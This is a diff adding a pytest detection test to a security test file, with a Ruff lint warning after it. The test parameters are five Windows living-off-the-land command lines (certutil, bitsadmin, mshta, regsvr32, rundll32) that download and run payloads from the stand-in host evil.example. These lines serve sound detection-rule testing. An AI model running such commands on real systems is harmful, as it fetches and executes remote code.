server/tests/security/test_benign_commands.py

```
@@ -0,0 +1,157 @@
+    @pytest.mark.parametrize("cmd", [
+        "certutil -urlcache -split -f http://evil.example/x.exe",
+        "bitsadmin /transfer evil http://evil.example/x.exe C:\\x.exe",
+        "mshta http://evil.example/x.hta",
+        "regsvr32 /s /u /i:http://evil.example/x.sct scrobj.dll",
+        "rundll32 javascript:\"\\..\\mshtml,RunHTMLApplication \"",
+    ])
+    def test_lolbin_windows_rule(self, cmd):
+        v = check_signature(cmd)
+        assert v.matched and v.rule_id == "lolbin-windows", (
+            f"{cmd!r} -> {v.rule_id!r}"
+        )
```

Ruff (0.15.12)

[warning] Assertion should be broken down into multiple parts

(PT018)